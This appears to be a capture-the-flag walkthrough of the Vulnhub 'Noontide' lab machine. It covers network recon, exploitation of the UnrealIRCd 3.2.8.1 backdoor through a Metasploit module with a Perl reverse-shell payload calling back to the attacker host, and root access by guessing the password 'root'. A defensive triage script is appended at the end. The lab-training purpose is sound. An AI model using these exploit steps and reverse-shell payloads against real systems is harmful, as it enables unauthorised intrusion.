
Vulnhub Noontide machine walkthrough

Posted: 2022-11-10 18:01:37  Views: 40

Noontide

Identify the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Noontide]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:d5:24:77      1      60  PCS Systemtechnik GmbH
 192.168.56.168  08:00:27:63:26:17      1      60  PCS Systemtechnik GmbH

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.168.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Noontide]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.168 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-10 04:28 EST
Nmap scan report for bogon (192.168.56.168)
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
MAC Address: 08:00:27:63:26:17 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.60 seconds

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Noontide]
└─$ searchsploit unrealircd
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow      | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute               | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                    | windows/dos/27407.pl
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/Vulnhub/Noontide]
└─$ msfconsole    


       =[ metasploit v6.2.9-dev                           ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Enable verbose logging with set VERBOSE true

msf6 > search unrealircd

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor

msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS  192.168.56.168
RHOSTS => 192.168.56.168
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[-] 192.168.56.168:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/
set payload cmd/unix/bind_perl                  set payload cmd/unix/bind_ruby_ipv6             set payload cmd/unix/reverse_bash_telnet_ssl    set payload cmd/unix/reverse_ruby
set payload cmd/unix/bind_perl_ipv6             set payload cmd/unix/generic                    set payload cmd/unix/reverse_perl               set payload cmd/unix/reverse_ruby_ssl
set payload cmd/unix/bind_ruby                  set payload cmd/unix/reverse                    set payload cmd/unix/reverse_perl_ssl           set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options 

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.56.168   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   6667             yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST  192.168.56.137
LHOST => 192.168.56.137
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.56.137:5555 
[*] 192.168.56.168:6667 - Connected to 192.168.56.168:6667...
    :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
    :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.56.168:6667 - Sending backdoor command...
[*] Exploit completed, but no session was created.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > 


searchsploit was used to look up exploits related to the unrealircd service. The first one was tried first; as the output shows, it requires changing the payload type.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload  cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options 

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   6667             yes       The target port (TCP)


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS  192.168.56.168
RHOSTS => 192.168.56.168
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST  192.168.56.137
LHOST => 192.168.56.137
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.56.137:4444 
[*] 192.168.56.168:6667 - Connected to 192.168.56.168:6667...
    :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
    :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.56.168:6667 - Sending backdoor command...
[*] Command shell session 1 opened (192.168.56.137:4444 -> 192.168.56.168:48516) at 2022-11-10 04:40:52 -0500

id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)


The payload type was re-selected, this time choosing the Perl-based reverse shell.

A shell was obtained successfully.

Privilege escalation

server@noontide:~$ cat local.txt
cat local.txt
c53c08b5bf2b0801c5d0c24149826a6e
server@noontide:~$ su - root
su - root
Password: root

root@noontide:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@noontide:~# cd /root
cd /root
root@noontide:~# ls -alh
ls -alh
total 24K
drwx------  3 root root 4.0K Aug  8  2020 .
drwxr-xr-x 18 root root 4.0K Aug  8  2020 ..
lrwxrwxrwx  1 root root    9 Aug  8  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Aug  8  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   85 Aug  8  2020 proof.txt
root@noontide:~# cat proof.txt
cat proof.txt
ab28c8ca8da1b9ffc2d702ac54221105

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@noontide:~# 

Trying the simple password root for the root account, privilege escalation succeeded immediately!

From this machine's walkthrough it can be seen that the payload selected in Metasploit affects whether the exploit executes successfully.
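The walkthrough above does the scan-to-exploit-database lookup by hand (nmap, then searchsploit). As an added example that is not part of the original post, the following Python script joins those two outputs from the defender's side: it parses the nmap -oN service lines and the searchsploit table (both constructed here from the text above) and returns one finding per exposed port that has public exploit entries, noting that nmap reported no version number, so the actual build still has to be confirmed before the host is queued for patching.

```python
"""Exposure triage: join the SERVICE/VERSION column of an nmap -oN report with
searchsploit hits so exposed services with public exploit entries get queued
for patching. Both inputs are constructed from the output shown in this post."""
import re

NMAP_OUTPUT = """\
Nmap scan report for bogon (192.168.56.168)
PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
"""

SEARCHSPLOIT_OUTPUT = """\
 Exploit Title | Path
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:.*\()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Return (host, [(port, state, version_string), ...]) from -oN text."""
    host, ports = None, []
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host = m.group(1)
        elif m := PORT_RE.match(line):
            port, _proto, state, _service, version = m.groups()
            ports.append((int(port), state, version.strip()))
    return host, ports


def parse_searchsploit(text):
    """Return [(title, path), ...]; header and separator rows carry no path."""
    hits = []
    for line in (l for l in text.splitlines() if "|" in l):
        title, path = (part.strip() for part in line.split("|", 1))
        if "/" in path:
            hits.append((title, path))
    return hits


def triage(nmap_text, searchsploit_text):
    """One finding per open port whose product name prefixes an exploit title."""
    host, ports = parse_nmap(nmap_text)
    hits = parse_searchsploit(searchsploit_text)
    findings = []
    for port, state, version in ports:
        product = version.split(" ")[0].lower()
        if state != "open" or not product:
            continue
        matched = [(t, p) for t, p in hits if t.lower().startswith(product)]
        if matched:
            findings.append({
                "host": host, "port": port, "product": version,
                # no digits in the version string: nmap could not confirm the build
                "version_known": bool(re.search(r"\d", version)),
                "remote": [p for _, p in matched if "/remote/" in p],
                "dos": [p for _, p in matched if "/dos/" in p],
            })
    return findings
```

A finding with `version_known` False is a prompt to verify the installed build from the host itself before deciding whether the listed entries apply.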

Source: https://www.cnblogs.com/jason-huawen/p/16877909.html
